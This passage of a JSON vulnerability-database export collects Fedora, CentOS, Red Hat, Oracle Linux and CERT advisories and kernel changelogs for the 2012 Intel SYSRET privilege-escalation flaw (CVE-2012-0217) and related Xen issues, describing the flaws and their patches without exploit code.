running under the Xen hypervisor ", "modified": "2012-06-26T00:42:08", "published": "2012-06-26T00:42:08", "id": "FEDORA:0275A21469", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-8.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:26:27", "published": "2012-08-05T21:26:27", "id": "FEDORA:A2013212DB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-24.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:31:48", "published": "2012-08-05T21:31:48", "id": "FEDORA:638FD21667", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-9.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:48:25", "published": "2012-08-21T09:48:25", "id": "FEDORA:8E44A20A90", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-2.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:53:53", "published": "2012-08-21T09:53:53", "id": "FEDORA:403F220D9F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-1.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1583", "CVE-2011-1898", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:41:50", "published": "2012-06-26T00:41:50", "id": "FEDORA:4C1E320FD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: xen-4.1.2-8.fc15", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T17:45:19", "published": "2012-09-17T17:45:19", "id": "FEDORA:C1281214A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-4.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411", "CVE-2012-4544"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-11-09T18:01:40", "published": "2012-11-09T18:01:40", "id": "FEDORA:A80012051E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-5.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T18:00:53", "published": "2012-09-17T18:00:53", "id": "FEDORA:63A4E21779", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-2.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0721\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-June/030716.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0721.html", "edition": 3, "modified": "2012-06-13T00:11:19", "published": "2012-06-13T00:11:19", "href": "http://lists.centos.org/pipermail/centos-announce/2012-June/030716.html", "id": "CESA-2012:0721", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T11:50:07", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0721", "href": "https://access.redhat.com/errata/RHSA-2012:0721", "type": "redhat", "title": "(RHSA-2012:0721) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-1583"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running on a\n64-bit host that has an Intel CPU, could use this flaw to crash the host\nor, potentially, escalate their privileges, allowing them to execute\narbitrary code at the hypervisor level. (CVE-2012-0217, Important)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit CVE-2012-0217.\n\n* A flaw in the xfrm6_tunnel_rcv() function in the Linux kernel's IPv6\nimplementation could lead to a use-after-free or double free flaw in\ntunnel6_rcv(). A remote attacker could use this flaw to send\nspecially-crafted packets to a target system that is using IPv6 and also\nhas the xfrm6_tunnel kernel module loaded, causing it to crash.\n(CVE-2012-1583, Important)\n\nIf you do not run applications that use xfrm6_tunnel, you can prevent the\nxfrm6_tunnel module from being loaded by creating (as the root user) a\n\"/etc/modprobe.d/xfrm6_tunnel.conf\" file, and adding the following line to\nit:\n\nblacklist xfrm6_tunnel\n\nThis way, the xfrm6_tunnel module cannot be loaded accidentally. A reboot\nis not necessary for this change to take effect.\n\nRed Hat would like to thank the Xen project for reporting CVE-2012-0217.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nThis update also fixes the following bugs:\n\n* A bug in the vsyscall interface caused 32-bit multi-threaded programs,\nwhich received the SIGCANCEL signal right after they returned from a system\ncall, to terminate unexpectedly with a segmentation fault when run on the\nAMD64 or Intel 64 architecture. A patch has been provided to address this\nissue and the crashes no longer occur in the described scenario.\n(BZ#807929)\n\n* Incorrect duplicate MAC addresses were being used on a rack network\ndaughter card that contained a quad-port Intel I350 Gigabit Ethernet\nController. With this update, the underlying source code has been modified\nto address this issue, and correct MAC addresses are now used under all\ncircumstances. (BZ#813195)\n\n* When the Fibre Channel (FC) layer sets a device to \"running\", the layer\nalso scans for other new devices. Previously, there was a race condition\nbetween these two operations. Consequently, for certain targets, thousands\nof invalid devices were created by the SCSI layer and the udev service.\nThis update ensures that the FC layer always sets a device to \"online\"\nbefore scanning for others, thus fixing this bug.\n\nAdditionally, when attempting to transition priority groups on a busy FC\ndevice, the multipath layer retried immediately. If this was the only\navailable path, a large number of retry operations were performed in a\nshort period of time. Consequently, the logging of retry messages slowed\ndown the system. This bug has been fixed by ensuring that the DM Multipath\nfeature delays retry operations in the described scenario. (BZ#816683)\n\n* Due to incorrect use of the list_for_each_entry_safe() macro, the\nenumeration of remote procedure calls (RPCs) priority wait queue tasks\nstored in the tk_wait.links list failed. As a consequence, the\nrpc_wake_up() and rpc_wake_up_status() functions failed to wake up all\ntasks. This caused the system to become unresponsive and could\nsignificantly decrease system performance. Now, the\nlist_for_each_entry_safe() macro is no longer used in rpc_wake_up(),\nensuring reasonable system performance. (BZ#817570)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T12:10:04", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0720", "href": "https://access.redhat.com/errata/RHSA-2012:0720", "type": "redhat", "title": "(RHSA-2012:0720) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 5, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721-1", "href": "http://linux.oracle.com/errata/ELSA-2012-0721-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721", "href": "http://linux.oracle.com/errata/ELSA-2012-0721.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 5, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1061-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 4, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061", "href": "http://linux.oracle.com/errata/ELSA-2012-1061.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-0744", "CVE-2012-0217", "CVE-2012-0218"], "description": "### Overview \n\nSome 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape.\n\nIntel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable.\n\n### Description \n\nA [ring3 attacker](<http://en.wikipedia.org/wiki/Ring_3>) may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. \n \n**Details from Xen** \n \n[_CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability_](<http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>) \n \n_A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state._ \n \n**Details from FreeBSD** \n \n[_FreeBSD-SA-12:04.sysret:__ __Privilege escalation when returning from kernel_](<http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>) \n \n_FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash._ \n \n**Details from Microsoft** \n \n[_User Mode Scheduler Memory Corruption Vulnerability - __MS12-042 - Important_](<http://technet.microsoft.com/en-us/security/bulletin/MS12-042>) \n \n_An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights._ \n \n_Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability_ \n \n_Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: _\n\n * _An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users._\n * _This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2._\n * _Systems with AMD or ARM-based CPUs are not affected by this vulnerability._\n \n**Details from Red Hat** \n \n[_RHSA-2012:0720-1_](<https://rhn.redhat.com/errata/RHSA-2012-0720.html>)_ & _[_RHSA-2012:0721-1_](<https://rhn.redhat.com/errata/RHSA-2012-0721.html>)_: __It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important)_ \n \nDetails from some affected vendors were not available at the time of publication. \n--- \n \n### Impact \n\nA local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape. \n \n--- \n \n### Solution \n\n**Apply an Update** \nPlease review the Vendor Information section of this document for vendor-specific patch and workaround details. \n \n--- \n \n### Vendor Information\n\n649219\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ 